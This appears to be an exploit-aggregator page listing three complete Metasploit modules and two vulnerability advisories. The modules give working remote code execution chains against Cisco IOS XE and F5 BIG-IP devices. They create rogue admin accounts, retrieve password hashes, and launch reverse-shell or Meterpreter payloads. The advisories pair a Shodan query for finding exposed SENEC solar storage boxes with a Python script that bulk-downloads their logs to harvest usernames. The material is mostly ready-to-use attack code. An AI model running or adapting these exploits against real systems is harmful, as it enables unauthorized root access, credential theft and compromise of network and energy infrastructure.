Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::CiscoIosXe include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Retry prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Cisco IOX XE Unauthenticated RCE Chain', 'Description' => %q{ This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE devices which have the Web UI exposed. An attacker can execute a payload with root privileges. The vulnerable IOS XE versions are: 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, 17.11.99SW }, 'License' => MSF_LICENSE, 'Author' => [ 'sfewer-r7', # MSF Exploit ], 'References' => [ ['CVE', '2023-20198'], ['CVE', '2023-20273'], # Vendor advisories. ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'], ['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'], # Vendor list of (205) vulnerable versions. ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'], # Technical details on CVE-2023-20198. ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'], ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'], # Technical details on CVE-2023-20273. ['URL', 'https://blog.leakix.net/2023/10/cisco-root-privesc/'], # Full details of a successful exploitation attempt from a honey pot. ['URL', 'https://gist.github.com/rashimo/a0ef01bc02e5e9fdf46bc4f3b5193cbf'], ], 'DisclosureDate' => '2023-10-16', 'Privileged' => true, 'Platform' => %w[linux unix], 'Arch' => [ARCH_CMD], 'Targets' => [ [ # Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads: # cmd/linux/http/x64/meterpreter/reverse_tcp # cmd/linux/http/x64/shell/reverse_tcp # cmd/linux/http/x86/shell/reverse_tcp 'Linux Command', { 'Platform' => 'linux', 'Arch' => [ARCH_CMD] }, ], [ # Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads: # cmd/unix/python/meterpreter/reverse_tcp # cmd/unix/reverse_bash 'Unix Command', { 'Platform' => 'unix', 'Arch' => [ARCH_CMD] }, ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ # We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of # 'global' should work, but exposing this as an option will allow for usage in more complex network setups. # A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to # inspect a devices configuration to see an appropriate VRF to use. OptString.new('CISCO_VRF_NAME', [ true, "The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.", 'global']), # We may need to try and execute a command a second time if it fails the first time. This option is the maximum # number of seconds to keep trying. OptInt.new('CISCO_CMD_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to execute a command.', 30]) ] ) end def check # First, a get request to the root of the Web UI, this lets us verify the target is a Cisco IOS XE device with # the Web UI exposed (which is the vulnerable component). res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri('webui') ) return CheckCode::Unknown('Connection failed') unless res # We look for one of two identifiers to ensure the request to /webui above returns something with Cisco in the content. if res.code != 200 || (!res.body.include?('Cisco Systems, Inc.') || !res.headers['Content-Security-Policy']&.include?('cisco.com')) return CheckCode::Unknown('Web UI not detected') end # By here we know the target is the IOS XE Web UI. We leverage the vulnerability to pull out the version number, # so if this request succeeds, then we known the target is vulnerable. res = run_cli_command('show version', Mode::PRIVILEGED_EXEC) # If the above request failed, then the target is safe. return CheckCode::Safe unless res version = 'Cisco IOS XE Software' # If we can pull out the version number via a regex, we do. If this fails, the target is still vulnerable # (as the above call to run_cli_command succeeded), however maybe this firmware version uses a different format # for the version information so our regex wont work. # Note: Version numbers can have letters in them, e.g. 17.11.99SW or 16.12.1z2 if res =~ /(Cisco IOS XE Software, Version \S+\.\S+\.\S+)/ version = Regexp.last_match(1) end CheckCode::Vulnerable(version) end def exploit admin_username = rand_text_alpha(8) admin_password = rand_text_alpha(8) # Leverage CVE-2023-20198 to run an arbitrary CLI command and create a new admin user account. unless run_cli_command("username #{admin_username} privilege 15 secret #{admin_password}", Mode::GLOBAL_CONFIGURATION) fail_with(Failure::UnexpectedReply, 'Failed to create admin user') end begin print_status("Created privilege 15 user '#{admin_username}' with password '#{admin_password}'") # Leverage CVE-2023-20273 to run an arbitrary OS commands and bootstrap a Metasploit payload... # A shell script to execute the Metasploit payload. Will delete itself upon execution. bootstrap_script = "#!/bin/sh\nrm -f $0\n#{payload.encoded}" # The location of our bootstrap script. bootstrap_file = "/tmp/#{Rex::Text.rand_text_alpha(8)}" # NOTE: Rather than chaining the commands with a semicolon, we run them separately. This allows version 16.* and # 17.8 to work as expected. Version 16.* did not work when semi colons were present in the command line. # Write a script to disk which will execute the Metasploit payload. We base64 encode it to avoid any problems # with restricted chars, and leverage openssl to decode and write the contents to disk. success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do next run_os_command("openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}", admin_username, admin_password) end unless success fail_with(Failure::UnexpectedReply, 'Failed to plant the bootstrap file') end # Make the script executable. success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do next run_os_command("chmod +x #{bootstrap_file}", admin_username, admin_password) end unless success fail_with(Failure::UnexpectedReply, 'Failed to chmod the bootstrap file') end # Execute our bootstrap script via mcp_chvrf.sh, and with 'global' virtual routing and forwarding (vrf) by # default. The VRF allows the executed script to route its network traffic back the the framework. The map_chvrf.sh # scripts wraps a call to /usr/sbin/chvrf, which will conveniently fork the command we supply. success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do next run_os_command("/usr/binos/conf/mcp_chvrf.sh #{datastore['CISCO_VRF_NAME']} sh #{bootstrap_file}", admin_username, admin_password) end unless success fail_with(Failure::UnexpectedReply, 'Failed to execute the bootstrap file') end ensure print_status("Removing user '#{admin_username}'") # Leverage CVE-2023-20198 to remove the admin account we previously created. unless run_cli_command("no username #{admin_username}", Mode::GLOBAL_CONFIGURATION) print_warning('Failed to remove user') end end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/proto/apache_j_p' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Retry ApacheJP = Rex::Proto::ApacheJP def initialize(info = {}) super( update_info( info, 'Name' => 'F5 BIG-IP TMUI AJP Smuggling RCE', 'Description' => %q{ This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to execute a command payload. Both the exploit and check methods automatically delete any temporary accounts that are created. }, 'Author' => [ 'Michael Weber', # vulnerability analysis 'Thomas Hendrickson', # vulnerability analysis 'Sandeep Singh', # nuclei template 'Spencer McIntyre' # metasploit module ], 'References' => [ ['CVE', '2023-46747'], ['URL', 'https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/'], ['URL', 'https://www.praetorian.com/blog/advisory-f5-big-ip-rce/'], ['URL', 'https://my.f5.com/manage/s/article/K000137353'], ['URL', 'https://github.com/projectdiscovery/nuclei-templates/pull/8496'], ['URL', 'https://attackerkb.com/topics/t52A9pctHn/cve-2023-46747/rapid7-analysis'] ], 'DisclosureDate' => '2023-10-26', # Vendor advisory 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Privileged' => true, 'Targets' => [ [ 'Command', { 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD } ], ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443, 'FETCH_WRITABLE_DIR' => '/tmp' }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [], 'SideEffects' => [ IOC_IN_LOGS, # user creation events are logged CONFIG_CHANGES # a temporary user is created then deleted ] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check res = create_user(role: 'Guest') return CheckCode::Unknown('No response received from target.') unless res return CheckCode::Safe('Failed to create the user.') unless res.code == 200 changed = update_user_password return CheckCode::Safe('Failed to set the new user\'s password.') unless changed res = bigip_api_tm_get_user(username) return CheckCode::Safe('Failed to validate the new user account.') unless res.get_json_document['kind'] == 'tm:auth:user:userstate' CheckCode::Vulnerable('Successfully tested unauthenticated user creation.') end def exploit res = create_user(role: 'Administrator') fail_with(Failure::UnexpectedReply, 'Failed to create the user.') unless res&.code == 200 changed = update_user_password fail_with(Failure::UnexpectedReply, 'Failed to set the new user\'s password.') unless changed print_good("Admin user was created successfully. Credentials: #{username} - #{password}") res = bigip_api_tm_get_user('admin') if res&.code == 200 && (hash = res.get_json_document['encryptedPassword']).present? print_good("Retrieved the admin hash: #{hash}") report_hash('admin', hash) end logged_in = retry_until_truthy(timeout: 30) do res = bigip_api_shared_login res&.code == 200 end fail_with(Failure::UnexpectedReply, 'Failed to login.') unless logged_in token = res.get_json_document.dig('token', 'token') fail_with(Failure::UnexpectedReply, 'Failed to obtain a login token.') if token.blank? print_status("Obtained login token: #{token}") bash_cmd = "eval $(echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d)" # this may or may not timeout send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'mgmt/tm/util/bash'), 'headers' => { 'Content-Type' => 'application/json', 'X-F5-Auth-Token' => token }, 'data' => { 'command' => 'run', 'utilCmdArgs' => "-c '#{bash_cmd}'" }.to_json ) end def report_hash(user, hash) jtr_format = Metasploit::Framework::Hashes.identify_hash(hash) service_data = { address: rhost, port: rport, service_name: 'F5 BIG-IP TMUI', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { module_fullname: fullname, origin_type: :service, private_data: hash, private_type: :nonreplayable_hash, jtr_format: jtr_format, username: user }.merge(service_data) credential_core = create_credential(credential_data) login_data = { core: credential_core, status: Metasploit::Model::Login::Status::UNTRIED }.merge(service_data) create_credential_login(login_data) end def cleanup super print_status('Deleting the created user...') delete_user end def username @username ||= rand_text_alpha(6..8) end def password @password ||= rand_text_alphanumeric(16..20) end def create_user(role:) # for roles and descriptions, see: https://techdocs.f5.com/kb/en-us/products/big-ip_ltm/manuals/product/bigip-user-account-administration-11-6-0/3.html send_request_smuggled_ajp({ 'handler' => '/tmui/system/user/create', 'form_page' => '/tmui/system/user/create.jsp', 'systemuser-hidden' => "[[\"#{role}\",\"[All]\"]]", 'systemuser-hidden_before' => '', 'name' => username, 'name_before' => '', 'passwd' => password, 'passwd_before' => '', 'finished' => 'x', 'finished_before' => '' }) end def delete_user send_request_smuggled_ajp({ 'handler' => '/tmui/system/user/list', 'form_page' => '/tmui/system/user/list.jsp', 'checkbox0' => username, 'checkbox0_before' => 'checked', 'delete_confirm' => 'Delete', 'delete_confirm_before' => 'Delete', 'row_count' => '1', 'row_count_before' => '1' }) end def update_user_password new_password = Rex::Text.rand_text_alphanumeric(password.length) changed = retry_until_truthy(timeout: 30) do res = bigip_api_shared_set_password(username, password, new_password) res&.code == 200 end @password = new_password if changed changed end def send_request_smuggled_ajp(query) post_data = "204\r\n" # do not change timenow = rand_text_numeric(1) tmui_dubbuf = rand_text_alpha_upper(11) query = query.merge({ '_bufvalue' => Base64.strict_encode64(OpenSSL::Digest::SHA1.new(tmui_dubbuf + timenow).digest), '_bufvalue_before' => '', '_timenow' => timenow, '_timenow_before' => '' }) query_string = URI.encode_www_form(query).ljust(370, '&') # see: https://tomcat.apache.org/tomcat-3.3-doc/ApacheJP.html#prefix-codes ajp_forward_request = ApacheJP::ApacheJPForwardRequest.new( http_method: ApacheJP::ApacheJPForwardRequest::HTTP_METHOD_POST, req_uri: '/tmui/Control/form', remote_addr: '127.0.0.1', remote_host: 'localhost', server_name: 'localhost', headers: [ { header_name: 'Tmui-Dubbuf', header_value: tmui_dubbuf }, { header_name: 'REMOTEROLE', header_value: '0' }, { header_name: 'host', header_value: 'localhost' } ], attributes: [ { code: ApacheJP::ApacheJPRequestAttribute::CODE_REMOTE_USER, attribute_value: 'admin' }, { code: ApacheJP::ApacheJPRequestAttribute::CODE_QUERY_STRING, attribute_value: query_string }, { code: ApacheJP::ApacheJPRequestAttribute::CODE_TERMINATOR } ] ) ajp_data = ajp_forward_request.to_binary_s[2...] unless ajp_data.length == 0x204 # 516 bytes # this is a developer error raise "AJP data must be 0x204 bytes, is 0x#{ajp_data.length.to_s(16)} bytes." end post_data << ajp_data post_data << "\r\n0" send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'tmui/login.jsp'), 'headers' => { 'Transfer-Encoding' => 'chunked, chunked' }, 'data' => post_data ) end def bigip_api_shared_set_password(user, old_password, new_password) send_request_cgi( 'method' => 'PATCH', 'uri' => normalize_uri(target_uri.path, 'mgmt/shared/authz/users', user), 'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64("#{username}:#{password}")}", 'Content-Type' => 'application/json' }, 'data' => { 'oldPassword' => old_password, 'password' => new_password }.to_json ) end def bigip_api_shared_login send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'mgmt/shared/authn/login'), 'headers' => { 'Content-Type' => 'application/json' }, 'data' => { 'username' => username, 'password' => password }.to_json ) end def bigip_api_tm_get_user(user) send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mgmt/tm/auth/user', user), 'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64("#{username}:#{password}")}", 'Content-Type' => 'application/json' } ) end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper include Msf::Exploit::Deprecated moved_from 'exploit/linux/http/f5_bigip_tmui_rce' def initialize(info = {}) super( update_info( info, 'Name' => 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE', 'Description' => %q{ This module exploits a directory traversal in F5's BIG-IP Traffic Management User Interface (TMUI) to upload a shell script and execute it as the Unix root user. Unix shell access is obtained by escaping the restricted Traffic Management Shell (TMSH). The escape may not be reliable, and you may have to run the exploit multiple times. Sorry! Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2, 15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4. Tested against the VMware OVA release of 14.1.2. }, 'Author' => [ 'Mikhail Klyuchnikov', # Discovery 'wvu' # Analysis and exploit ], 'References' => [ ['CVE', '2020-5902'], ['URL', 'https://support.f5.com/csp/article/K52145254'], ['URL', 'https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/'] ], 'DisclosureDate' => '2020-06-30', # Vendor advisory 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => { 'CMDSTAGER::FLAVOR' => :bourne, 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'SSL' => true, 'WfsDelay' => 5 }, 'Notes' => { 'Stability' => [SERVICE_RESOURCE_LOSS], # May disrupt the service 'Reliability' => [UNRELIABLE_SESSION], # Seems a little finicky 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK] } ) ) register_options([ Opt::RPORT(443), OptString.new('TARGETURI', [true, 'Base path', '/']) ]) register_advanced_options([ OptString.new('WritableDir', [true, 'Writable directory', '/tmp']) ]) end def check res = send_request_cgi( 'method' => 'POST', 'uri' => dir_trav('/tmui/locallb/workspace/fileRead.jsp'), 'vars_post' => { 'fileName' => '/etc/f5-release' } ) unless res return CheckCode::Unknown('Target did not respond to check.') end unless res.code == 200 && /BIG-IP release (?<version>[\d.]+)/ =~ res.body return CheckCode::Safe('Target did not respond with BIG-IP version.') end # If we got here, the directory traversal was successful CheckCode::Vulnerable("Target is running BIG-IP #{version}.") end def exploit create_alias print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager(temp: datastore['WritableDir']) end ensure delete_alias if @created_alias end def create_alias print_status('Creating alias list=bash') res = send_request_cgi( 'method' => 'POST', 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'), 'vars_post' => { 'command' => 'create cli alias private list command bash' } ) if res.nil? || (error = parse_error(res)) case error when /private "list" $list$ already exists/ print_error('Alias "list" already exists, deleting it') delete_alias # Try to create the alias again return create_alias when /java\.lang\.NullPointerException/ print_error('Encountered java.lang.NullPointerException, retrying!') # XXX: Try to create the alias until we're successful return create_alias end fail_with(Failure::UnexpectedReply, "Failed to create alias list=bash#{error}") end @created_alias = true print_good('Successfully created alias list=bash') end def execute_command(cmd, _opts = {}) vprint_status("Executing command: #{cmd}") upload_script(cmd) execute_script end def upload_script(cmd) print_status("Uploading #{script_path}") res = send_request_cgi( 'method' => 'POST', 'uri' => dir_trav('/tmui/locallb/workspace/fileSave.jsp'), 'vars_post' => { 'fileName' => script_path, 'content' => cmd } ) if res.nil? || (error = parse_error(res)) fail_with(Failure::UnexpectedReply, "Failed to upload #{script_path}#{error}") end register_file_for_cleanup(script_path) print_good("Successfully uploaded #{script_path}") end def execute_script print_status("Executing #{script_path}") res = send_request_cgi({ 'method' => 'POST', 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'), 'vars_post' => { 'command' => "list #{script_path}" } }, 3.5) # No response may mean the service is blocking on payload execution return unless res && (error = parse_error(res)) case error when /unexpected argument/ print_error('Alias "list" does not exist, attempting to create it again') create_alias # Try to execute the script again... smdh return execute_script when /java\.lang\.NullPointerException/ print_error('Encountered java.lang.NullPointerException, retrying!') # XXX: Try to execute the script until we're successful return execute_script end print_error("Failed to execute #{script_path}#{error}") end def delete_alias print_status('Deleting alias list=bash') res = send_request_cgi( 'method' => 'POST', 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'), 'vars_post' => { 'command' => 'delete cli alias private list' } ) if res.nil? || (error = parse_error(res)) case error when /user alias $list admin$ was not found/ print_good('Alias "list" does not exist or was already deleted') return when /java\.lang\.NullPointerException/ print_error('Encountered java.lang.NullPointerException, retrying!') # XXX: Try to delete the alias until we're successful return delete_alias end print_warning("Failed to delete alias list=bash#{error}") return end print_good('Successfully deleted alias list=bash') end def parse_error(res) return unless res error = case res.code when 200 res.get_json_document['error'] when 500 # This is usually a java.lang.NullPointerException stack trace res.get_html_document.at('//pre')&.text else res.body end return if error.blank? ":\n#{error.strip}" end def dir_trav(path) # PoC courtesy of the referenced F5 advisory: <LocationMatch ".*\.\.;.*"> normalize_uri(target_uri.path, '/tmui/login.jsp/..;', path) end def script_path @script_path ||= normalize_uri(datastore['WritableDir'], rand_text_alphanumeric(8..42)) end end </code></pre>

<pre><code>Advisory ID: Ph0s-2023-001 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Version(s): Firmware: all (as of 2023-06-19) Tested Version(s): current Vulnerability Type: CWE-284: Improper Access Control Risk Level: CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N1 (7.5 High) Manufacturer Risk Level Rating: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:T/RC:C Overall CVSS Score: 7.2 Solution Status: Fixed Manufacturer Notification: 2023-06-05 Public Disclosure: 2023-11-01 CVE Reference: CVE-2023-39167 Author of Advisory: Ph0s[4], R0ckE7 ******************************************************************************** Overview: Foreword: This vulnerability was reported to the enbw-cert. we would like to thank enbw-cert for taking care of the vulns and patch the systems. we decided to publish when most of the reported vulns are patched to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. About Senec: We are SENEC We have been the EnBW energy independence experts since 2018 – but we have put our heart and soul into guiding customers on the route to independence since SENEC was founded in 2009. Our passion lies in actively promoting the energy transition with innovative ideas and pioneering products. And, because we don’t do things by halves, our unwavering ambition is to create integrated solutions that enable you to enjoy the highest possible degree of independence and sustainability through self-generation of solar electricity. About SENEC Home: SENEC.Home: The smart electricity storage device for your home SENEC.Home is the heart of the your sustainable, affordable supply of solar electricity. The smart battery storage device stores excess electricity generated by your PV system so that you can use it when you need it – such as when your household’s energy consumption rises in the evening, or on rainy days when your PV system generates less power. ******************************************************************************** Vulnerability Details: No authentication is required to access log information. The URL required for this corresponds to the scheme http://SENEC-IP/log/YYYY/MM/DD.log , e.g.: http://178.202.XX.XXX/log/2023/05/14.log These contain sensitive information about the operating status of the photovoltaic system, software releases and usernames used for login. An unauthenticated attacker is able to use this information, among other things, to: • Draw conclusions about the effectiveness of various types of attacks, e.g. by evaluating changes in the logged operating status. • Target known vulnerabilities related to the software release of the application itself and any used third-party libraries. • Use it as a stepping stone for deeper attacks, e.g. to prepare brute force attacks involving the usernames provided in the log. ******************************************************************************** Proof of Concept (PoC): The attack consists of the following steps: 1. grab an ip of an affected System, eg via Shodan Dork: https://www.shodan.io/search?query=http.html%3A<title>SENEC<%2Ftitle> 2. exploit by reading the log ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Patched by Manufacturer (Rolled out until September 11, 2023) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-06-01: Vulnerability discovered 2023-06-05: Vulnerability reported to manufacturer 2023-09-11: Patch rollout by manufacturer to affected devices 2023-11-01: Public disclosure of vulnerability ************************************************************************ Researcher: Ph0s[4], R0ckE7 ************************************************************************ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en </code></pre>

<pre><code>Advisory ID: Ph0s-2023-002 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Version(s): Firmware: all (as of 2023-06-19) Tested Version(s): current Vulnerability Type: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor Risk Level: CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 High) Manufacturer Risk Level Rating: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:T/RC:C Overall CVSS Score: 7.2 Solution Status: Fixed Manufacturer Notification: 2023-06-05 Public Disclosure: 2023-11-01 CVE Reference: CVE-2023-39168 Author of Advisory: Ph0s[4], R0ckE7 ******************************************************************************** Overview: Foreword: This vulnerability was reported to the enbw-cert. we would like to thank enbw-cert for taking care of the vulns and patch the systems. we decided to publish when most of the reported vulns are patched to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. About Senec: We are SENEC We have been the EnBW energy independence experts since 2018 – but we have put our heart and soul into guiding customers on the route to independence since SENEC was founded in 2009. Our passion lies in actively promoting the energy transition with innovative ideas and pioneering products. And, because we don’t do things by halves, our unwavering ambition is to create integrated solutions that enable you to enjoy the highest possible degree of independence and sustainability through self-generation of solar electricity. About SENEC Home: SENEC.Home: The smart electricity storage device for your home SENEC.Home is the heart of the your sustainable, affordable supply of solar electricity. The smart battery storage device stores excess electricity generated by your PV system so that you can use it when you need it – such as when your household’s energy consumption rises in the evening, or on rainy days when your PV system generates less power. ******************************************************************************** Vulnerability Details: As already stated in CVE-2023-39167, no authentication is required to access log information. Therefore, and due to the predictable URL scheme, it is possible for an attacker to download all existing log files to obtain the username. ******************************************************************************** Proof of Concept (PoC): The attack consists of the following steps: 1. parse the script using this PoC Code to obtail the username: import argparse import datetime import os import requests def get_senec_logs(senec_ip, day_range, break_on_username): start_date = datetime.datetime.today() end_date = start_date - datetime.timedelta(days=day_range) delta = datetime.timedelta(days=1) while end_date < start_date: try: senec_url = f"http://{senec_ip}/log/{start_date.strftime('%Y')}/" \ f"{start_date.strftime('%m')}/{start_date.strftime('%d')}.log" r = requests.get(senec_url) print(f"HTTP Status Code {r.status_code}: {senec_url}") if r.status_code != 200: break if r.headers["Content-Length"] == "0": break os.makedirs(os.path.dirname(senec_url.replace("http://", "")), exist_ok=True) with open(senec_url.replace("http://", ""), "wb") as senec_log_file: senec_log_file.write(r.content) offset = r.content.find(bytes("username:", "utf-8")) if offset != -1: print(f"Username found in {senec_log_file.name} at offset {offset}") if break_on_username: break except requests.ConnectionError: print("Failed to connect to SENEC.Inverter") break except Exception as e: print(f"An unhandled exception occurred:\n{e}") break start_date -= delta if name == 'main': parser = argparse.ArgumentParser(description="Download SENEC.Inverter log files") parser.add_argument("ip", type=str, help="IP address of the target SENEC.Inverter") parser.add_argument("-b", "--break-on-username", action="store_true", default=False, required=False, help="stop downloading once a username is found") parser.add_argument("-d", "--day-range", type=int, action="store", default=365 * 20, required=False, help="number of days to download log files in reverse order starting today") args = parser.parse_args() get_senec_logs(args.ip, args.day_range, args.break_on_username) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Patched by Manufacturer (Rolled out until September 11, 2023) 